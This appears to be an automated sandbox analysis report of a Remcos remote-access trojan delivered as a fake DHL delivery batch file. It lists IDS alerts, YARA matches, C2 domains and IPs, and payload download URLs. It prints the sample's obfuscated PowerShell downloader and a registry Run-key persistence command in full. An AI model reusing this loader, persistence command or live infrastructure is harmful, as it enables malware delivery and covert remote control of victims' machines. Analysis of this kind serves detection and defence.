              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Startup key" /t REG_EXPAND_SZ /d "%Stalemated% -windowstyle 1 $Taknemmeligste=(gi 'HKCU:\Software\Lnoverfrslerne\').GetValue('newsmagazines');%Stalemated% ($Taknemmeligste)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Startup key" /t REG_EXPAND_SZ /d "%Stalemated% -windowstyle 1 $Taknemmeligste=(gi 'HKCU:\Software\Lnoverfrslerne\').GetValue('newsmagazines');%Stalemated% ($Taknemmeligste)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 3300, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Startup key" /t REG_EXPAND_SZ /d "%Stalemated% -windowstyle 1 $Taknemmeligste=(gi 'HKCU:\Software\Lnoverfrslerne\').GetValue('newsmagazines');%Stalemated% ($Taknemmeligste)", ProcessId: 4640, ProcessName: cmd.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "echo $Reconjoin;function Yngve($Sagan){ .($Miljforandringen) ($Sagan)} function Freeloaded($Knyttelversenes){$Unsuppleness=5;do{$Nonordered+=$Knyttelversenes[$Unsuppleness];$Unsuppleness+=6;$Gaardmand=Format-List} until(!$Knyttelversenes[$Unsuppleness])$Nonordered}$Stokerfyrene9=Freeloaded ' GadeN s ejeMangat Anhy.Retniw';$Stokerfyrene9+=Freeloaded 'Lithse nalybFa erc U milPrec.IRailrE SlgtNVid rt';$Udtalendes=Freeloaded 'CommuMSpurro,vulrz in.tiCoccilBir.mlTre eaSte,n/';$Unsupplenesschthyologic=Freeloaded 'VirtuTTermolDebats Humu1Tusin2';$Soejlevis='Green[GratiNCentreM niatHegem. Ud aSGrisgETeaterAfslav Ce lIClaywCFlybyENectaPDionyo PanaI aarenF,refTIn,erMDrgniaLuftfn FednaBeredgRapnie DoveRBreds]Helli:Smoko: portSRestre He lcP.rmuuTalefR ArriiBalbutGastrYSm.lkpPusssRSlaveOTyptoT Sy co ffabCBouiloPlejelB,jle= Soli$SkuesU Ss eNtoymas fteuGa.lopCystep Ui.eLTonsiEjejunn SystEContrSAristSO denCStyk hH ortT Ove h entyParalOTr efL Veg oBargaGHorteIS ngnc';$Udtalendes+=Freeloaded ' Ski 5Ov rk.Jensp0Eastr Inebr( Rev W.elefiPantenGipsudLemaro NeurwApotesManas Attr NZamorTgamle Te.ns1Sputn0cuiss. Ti.s0Fines;Torsk CadmiWFrakoiVul,anGaase6Kreat4,lkef; Stic Uninsx Slag6,awmo4P two;fort UnchrChefsvCivil:D,ndr1uneat3 ykke4Coshe.Fotog0.itel)Kr ig UdpoGTranseS aftcMuslikAortooRetab/Trach2 prin0Skumm1Afrik0Rhamn0Outsp1 cadm0S ill1Be gg KnittFUrtepi AvisreftereNarref K onoInditx S tr/No,su1Rdbed3 Besk4 Bist.Bukse0';$Absurdistisk=Freeloaded ' Kom,uPetu,SGearkEPulveR Kell-GendeaForkoG inusEPseudNSpherT';$Gigtfebers=Freeloaded 'E bothHavmit .wizt inegpReallsMniac:baa.m/Chi.k/Eng lpTapsae ForhnIterodFr,tieAfsp l PurdiRespivAdopteindklr PodoySk alh Nat linde . Har cMisaloD,modmVog.m/BrugeMS ttiuBidsar C mpkAlkyde Anc rOv,rc. SejllMtrikpTank k Spic> Natuh Bl.et F lctMhla,pUndersA gaa:Udvik/Deute/Skol.pMagteeSkibsn Im rd.ophieAntislD iryiPa advNonreeblaakrpatriy Rou,h revolTrskoxSubtrp Medd.Uddifc DyksoUdslum Hrme/WolflMRekinuGrororYndlikT luseSleskr nder.Hektol GrnspStridk';$Delggelsesdrifters=Freeloaded 'Overd>';$Miljforandringen=Freeloaded 'GrublIGraniE By.aX';$Adulterers='sammenbundne';$Unincriminated='\regnskabsinformationernes.arm';Yngve (Freeloaded 'Kontr$ForfagPraecLSemipO ekstbWadinaHjertlClu r:T ailtEd toRGlansOD.gteuK epesSaccaeLebisR Cavae Heget la atMor gENedrySAutop= Toug$OxygaEHistoNA sisVScore:JutehAPluriPClimapprecodPenn aHjemmtTo liA Disj+Skelg$SonorU ContNUnsi Iu iraNAutenCStnder ,eakiKloreMLateri antinUdtrkaK mmuT,uldtE V,std');Yngve (Freeloaded 'Probl$PerioGEksemlDi.agoPostnbsalamaEndo LPerfe:JujubHSuiliE lreSTa llTPerso=glded$ Sup.gPr seiObserGVisnitIndisFU,dlaePig ibAssocETidsuRBesidS .rim.InaptsTryk pRevisl DomfIheldiTSur,n(Ant.t$Slt ed BusieFunktLSymphGTriolgHybrieDolenL GoanSSc ooeruti sBrandDHolodrCom aIMultifoppostPat.neIndt,rKo ifSOrdre)');Yngve (Freeloaded $Soejlevis);$Gigtfebers=$hest[0];$Mervrdiafgift=(Freeloaded 'Who t$ uncogNedd LPincuoBleedbUnderaWim,llSubru:Vi.icdDdsdmuBulniE ForunHi
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-07T18:39:53.558632+010020365941Malware Command and Control Activity Detected192.168.2.549710192.169.69.2657483TCP
              2025-03-07T18:42:08.939864+010020365941Malware Command and Control Activity Detected192.168.2.549698192.169.69.2657483TCP
              2025-03-07T18:42:30.459358+010020365941Malware Command and Control Activity Detected192.168.2.549700192.169.69.2657483TCP
              2025-03-07T18:42:51.833288+010020365941Malware Command and Control Activity Detected192.168.2.549702192.169.69.2657483TCP
              2025-03-07T18:43:12.864207+010020365941Malware Command and Control Activity Detected192.168.2.549704192.169.69.2657483TCP
              2025-03-07T18:43:33.684607+010020365941Malware Command and Control Activity Detected192.168.2.549706192.169.69.2657483TCP
              2025-03-07T18:43:54.850362+010020365941Malware Command and Control Activity Detected192.168.2.549708192.169.69.2657483TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-07T18:41:49.083229+010020327761Malware Command and Control Activity Detected192.168.2.549697192.169.69.2657484TCP
              2025-03-07T18:42:10.303202+010020327761Malware Command and Control Activity Detected192.168.2.549699192.169.69.2657484TCP
              2025-03-07T18:42:31.800726+010020327761Malware Command and Control Activity Detected192.168.2.549701192.169.69.2657484TCP
              2025-03-07T18:42:53.335424+010020327761Malware Command and Control Activity Detected192.168.2.549703192.169.69.2657484TCP
              2025-03-07T18:43:14.238134+010020327761Malware Command and Control Activity Detected192.168.2.549705192.169.69.2657484TCP
              2025-03-07T18:43:35.087029+010020327761Malware Command and Control Activity Detected192.168.2.549707192.169.69.2657484TCP
              2025-03-07T18:43:56.342452+010020327761Malware Command and Control Activity Detected192.168.2.549709192.169.69.2657484TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-07T18:41:46.878851+010028032702Potentially Bad Traffic192.168.2.549696172.67.218.131443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: awb_post_dhl_delivery_documents_06_03_2025_00000000000250506.batVirustotal: Detection: 30%Perma Link
              Source: awb_post_dhl_delivery_documents_06_03_2025_00000000000250506.batReversingLabs: Detection: 18%
              Source: Yara matchFile source: 0000000A.00000002.3800682702.0000000008459000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 3300, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\hsGaonspt.dat, type: DROPPED
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
              Source: unknownHTTPS traffic detected: 172.67.218.131:443 -> 192.168.2.5:49694 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.218.131:443 -> 192.168.2.5:49696 version: TLS 1.2
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2317923599.00000000080F0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: m.Core.pdbk source: powershell.exe, 00000004.00000002.2317923599.00000000080F0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2312012117.0000000007041000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: stem.Core.pdb source: powershell.exe, 00000004.00000002.2317923599.00000000080F0000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49698 -> 192.169.69.26:57483
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49701 -> 192.169.69.26:57484
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49697 -> 192.169.69.26:57484
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49705 -> 192.169.69.26:57484
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49700 -> 192.169.69.26:57483
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49709 -> 192.169.69.26:57484
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49699 -> 192.169.69.26:57484
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49704 -> 192.169.69.26:57483
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49707 -> 192.169.69.26:57484
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49703 -> 192.169.69.26:57484
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49706 -> 192.169.69.26:57483
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49708 -> 192.169.69.26:57483
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49702 -> 192.169.69.26:57483
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49710 -> 192.169.69.26:57483
              Source: unknownDNS query: name: ortain7histas2.duckdns.org
              Source: unknownDNS query: name: ortain7histas1.duckdns.org
              Source: unknownDNS query: name: ortain7histas3.duckdns.org
              Source: unknownDNS query: name: ortain7histas4.duckdns.org
              Source: Joe Sandbox ViewIP Address: 192.169.69.26 192.169.69.26
              Source: Joe Sandbox ViewIP Address: 192.169.69.26 192.169.69.26
              Source: Joe Sandbox ViewASN Name: WOWUS WOWUS
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49696 -> 172.67.218.131:443
              Source: global trafficHTTP traffic detected: GET /Murker.lpk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: pendeliveryhl.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /ZpOXPI208.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: pendeliveryhl.comCache-Control: no-cache
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /Murker.lpk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: pendeliveryhl.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /ZpOXPI208.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: pendeliveryhl.comCache-Control: no-cache
              Source: global trafficDNS traffic detected: DNS query: pendeliveryhl.com
              Source: global trafficDNS traffic detected: DNS query: ortain7histas1.duckdns.org
              Source: global trafficDNS traffic detected: DNS query: ortain7histas2.duckdns.org
              Source: global trafficDNS traffic detected: DNS query: ortain7histas3.duckdns.org
              Source: global trafficDNS traffic detected: DNS query: ortain7histas4.duckdns.org
              Source: powershell.exe, 00000002.00000002.1522233250.0000026CAE5EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2295354088.000000000562E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000002.00000002.1494746549.0000026C9EABF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pendeliveryhl.com
              Source: powershell.exe, 00000004.00000002.2276593140.0000000004719000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.1494746549.0000026C9E571000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2276593140.00000000045C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000004.00000002.2276593140.0000000004719000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000002.00000002.1494746549.0000026C9E571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000004.00000002.2276593140.00000000045C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000004.00000002.2295354088.000000000562E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000004.00000002.2295354088.000000000562E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000004.00000002.2295354088.000000000562E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000004.00000002.2276593140.0000000004719000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.1522233250.0000026CAE5EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2295354088.000000000562E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000002.00000002.1494746549.0000026C9E79E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1494746549.0000026C9EAB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pendeliveryhl.com
              Source: msiexec.exe, 0000000A.00000002.3800682702.0000000008420000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pendeliveryhl.com/
              Source: powershell.exe, 00000002.00000002.1494746549.0000026C9FEC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1494746549.0000026C9E79E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2276593140.0000000004719000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pendeliveryhl.com/Murker.lpk
              Source: msiexec.exe, 0000000A.00000002.3800682702.0000000008420000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pendeliveryhl.com/Q
              Source: msiexec.exe, 0000000A.00000002.3800682702.00000000083E3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.3814311297.0000000023D60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pendeliveryhl.com/ZpOXPI208.bin
              Source: msiexec.exe, 0000000A.00000002.3800682702.00000000083E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pendeliveryhl.com/ZpOXPI208.bin=
              Source: msiexec.exe, 0000000A.00000002.3814311297.0000000023D60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pendeliveryhl.com/ZpOXPI208.binUdresPropendeliveryhlxp.com/ZpOXPI208.bin
              Source: powershell.exe, 00000004.00000002.2276593140.0000000004719000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pendeliveryhlxp.com/Murker.lpk
              Source: powershell.exe, 00000002.00000002.1494746549.0000026C9FEC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1494746549.0000026C9E79E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pendeliveryhlxp.com/Murker.lpk=9
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
              Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
              Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
              Source: unknownHTTPS traffic detected: 172.67.218.131:443 -> 192.168.2.5:49694 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.218.131:443 -> 192.168.2.5:49696 version: TLS 1.2

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 0000000A.00000002.3800682702.0000000008459000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 3300, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\hsGaonspt.dat, type: DROPPED

              System Summary

              barindex
              Source: amsi32_6580.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 6232, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 6580, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: awb_post_dhl_delivery_documents_06_03_2025_00000000000250506.batStatic file information: Suspicious name
              Source: C:\Windows\SysWOW64\msiexec.exeProcess Stats: CPU usage > 49%
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF7C816AB462_2_00007FF7C816AB46
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF7C816B8F22_2_00007FF7C816B8F2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF7C816216A2_2_00007FF7C816216A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF7C823A70A2_2_00007FF7C823A70A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF7C8239EFA2_2_00007FF7C8239EFA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_02D1E9184_2_02D1E918
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_02D1F1E84_2_02D1F1E8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_02D1E5D04_2_02D1E5D0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_02D11C004_2_02D11C00
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Startup key" /t REG_EXPAND_SZ /d "%Stalemated% -windowstyle 1 $Taknemmeligste=(gi 'HKCU:\Software\Lnoverfrslerne\').GetValue('newsmagazines');%Stalemated% ($Taknemmeligste)"
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 7062
              Source: unknownProcess created: Commandline size = 7086
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 7062Jump to behavior
              Source: amsi32_6580.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 6232, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 6580, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.evad.winBAT@14/10@22/2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\regnskabsinformationernes.armJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5860:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8148:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5556:120:WilError_03
              Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\hoijuHgetgtso-VDU43F
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1044:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2r3oue00.ozp.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\awb_post_dhl_delivery_documents_06_03_2025_00000000000250506.bat" "
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6232
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6580
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
              Source: awb_post_dhl_delivery_documents_06_03_2025_00000000000250506.batVirustotal: Detection: 30%
              Source: awb_post_dhl_delivery_documents_06_03_2025_00000000000250506.batReversingLabs: Detection: 18%
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\awb_post_dhl_delivery_documents_06_03_2025_00000000000250506.bat" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "echo $Reconjoin;function Yngve($Sagan){ .($Miljforandringen) ($Sagan)} function Freeloaded($Knyttelversenes){$Unsuppleness=5;do{$Nonordered+=$Knyttelversenes[$Unsuppleness];$Unsuppleness+=6;$Gaardmand=Format-List} until(!$Knyttelversenes[$Unsuppleness])$Nonordered}$Stokerfyrene9=Freeloaded ' GadeN s ejeMangat Anhy.Retniw';$Stokerfyrene9+=Freeloaded 'Lithse nalybFa erc U milPrec.IRailrE SlgtNVid rt';$Udtalendes=Freeloaded 'CommuMSpurro,vulrz in.tiCoccilBir.mlTre eaSte,n/';$Unsupplenesschthyologic=Freeloaded 'VirtuTTermolDebats Humu1Tusin2';$Soejlevis='Green[GratiNCentreM niatHegem. Ud aSGrisgETeaterAfslav Ce lIClaywCFlybyENectaPDionyo PanaI aarenF,refTIn,erMDrgniaLuftfn FednaBeredgRapnie DoveRBreds]Helli:Smoko: portSRestre He lcP.rmuuTalefR ArriiBalbutGastrYSm.lkpPusssRSlaveOTyptoT Sy co ffabCBouiloPlejelB,jle= Soli$SkuesU Ss eNtoymas fteuGa.lopCystep Ui.eLTonsiEjejunn SystEContrSAristSO denCStyk hH ortT Ove h entyParalOTr efL Veg oBargaGHorteIS ngnc';$Udtalendes+=Freeloaded ' Ski 5Ov rk.Jensp0Eastr Inebr( Rev W.elefiPantenGipsudLemaro NeurwApotesManas Attr NZamorTgamle Te.ns1Sputn0cuiss. Ti.s0Fines;Torsk CadmiWFrakoiVul,anGaase6Kreat4,lkef; Stic Uninsx Slag6,awmo4P two;fort UnchrChefsvCivil:D,ndr1uneat3 ykke4Coshe.Fotog0.itel)Kr ig UdpoGTranseS aftcMuslikAortooRetab/Trach2 prin0Skumm1Afrik0Rhamn0Outsp1 cadm0S ill1Be gg KnittFUrtepi AvisreftereNarref K onoInditx S tr/No,su1Rdbed3 Besk4 Bist.Bukse0';$Absurdistisk=Freeloaded ' Kom,uPetu,SGearkEPulveR Kell-GendeaForkoG inusEPseudNSpherT';$Gigtfebers=Freeloaded 'E bothHavmit .wizt inegpReallsMniac:baa.m/Chi.k/Eng lpTapsae ForhnIterodFr,tieAfsp l PurdiRespivAdopteindklr PodoySk alh Nat linde . Har cMisaloD,modmVog.m/BrugeMS ttiuBidsar C mpkAlkyde Anc rOv,rc. SejllMtrikpTank k Spic> Natuh Bl.et F lctMhla,pUndersA gaa:Udvik/Deute/Skol.pMagteeSkibsn Im rd.ophieAntislD iryiPa advNonreeblaakrpatriy Rou,h revolTrskoxSubtrp Medd.Uddifc DyksoUdslum Hrme/WolflMRekinuGrororYndlikT luseSleskr nder.Hektol GrnspStridk';$Delggelsesdrifters=Freeloaded 'Overd>';$Miljforandringen=Freeloaded 'GrublIGraniE By.aX';$Adulterers='sammenbundne';$Unincriminated='\regnskabsinformationernes.arm';Yngve (Freeloaded 'Kontr$ForfagPraecLSemipO ekstbWadinaHjertlClu r:T ailtEd toRGlansOD.gteuK epesSaccaeLebisR Cavae Heget la atMor gENedrySAutop= Toug$OxygaEHistoNA sisVScore:JutehAPluriPClimapprecodPenn aHjemmtTo liA Disj+Skelg$SonorU ContNUnsi Iu iraNAutenCStnder 